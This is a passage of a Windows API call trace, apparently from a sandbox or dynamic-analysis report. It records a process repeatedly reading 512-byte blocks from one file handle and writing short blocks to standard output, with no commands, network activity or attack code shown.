[0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] GetFileType (hFile=0x50) returned 0x1 [0236.241] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.241] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.241] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.241] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.241] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] GetFileType (hFile=0x50) returned 0x1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] GetFileType (hFile=0x50) returned 0x1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] GetFileType (hFile=0x50) returned 0x1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.241] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] GetFileType (hFile=0x50) returned 0x1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, 
lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] GetFileType (hFile=0x50) returned 0x1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] GetFileType (hFile=0x50) returned 0x1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] GetFileType (hFile=0x50) returned 0x1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] GetFileType (hFile=0x50) returned 0x1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.242] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.242] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.242] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.242] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] GetFileType (hFile=0x50) returned 0x1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] GetFileType (hFile=0x50) returned 0x1 [0236.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.242] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] GetFileType (hFile=0x50) returned 0x1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] GetFileType (hFile=0x50) returned 0x1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] GetFileType (hFile=0x50) returned 0x1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] GetFileType (hFile=0x50) returned 0x1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] WriteFile (in: 
hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] GetFileType (hFile=0x50) returned 0x1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] GetFileType (hFile=0x50) returned 0x1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.243] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.243] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.243] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] GetFileType (hFile=0x50) returned 0x1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] GetFileType (hFile=0x50) returned 0x1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.244] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0236.244] GetFileType (hFile=0x50) returned 0x1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] GetFileType (hFile=0x50) returned 0x1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] GetFileType (hFile=0x50) returned 0x1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] GetFileType (hFile=0x50) returned 0x1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] GetFileType (hFile=0x50) returned 0x1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 
[0236.244] GetFileType (hFile=0x50) returned 0x1 [0236.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.244] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.245] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.245] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.245] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.245] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] GetFileType (hFile=0x50) returned 0x1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] GetFileType (hFile=0x50) returned 0x1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] GetFileType (hFile=0x50) returned 0x1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] GetFileType (hFile=0x50) returned 0x1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, 
lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] GetFileType (hFile=0x50) returned 0x1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] GetFileType (hFile=0x50) returned 0x1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] GetFileType (hFile=0x50) returned 0x1 [0236.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.245] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] GetFileType (hFile=0x50) returned 0x1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.246] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.246] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.246] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.246] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] GetFileType (hFile=0x50) returned 0x1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] GetFileType (hFile=0x50) returned 0x1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] GetFileType (hFile=0x50) returned 0x1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] GetFileType (hFile=0x50) returned 0x1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] GetFileType (hFile=0x50) returned 0x1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.246] GetFileType (hFile=0x50) returned 0x1 [0236.246] _get_osfhandle (_FileHandle=1) returned 
0x50 [0236.246] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.247] GetFileType (hFile=0x50) returned 0x1 [0236.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.247] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.247] GetFileType (hFile=0x50) returned 0x1 [0236.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.247] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.247] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.247] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.247] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.247] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.247] GetFileType (hFile=0x50) returned 0x1 [0236.247] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.247] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, 
lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.247] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.247] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: 
lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.248] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, 
lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, 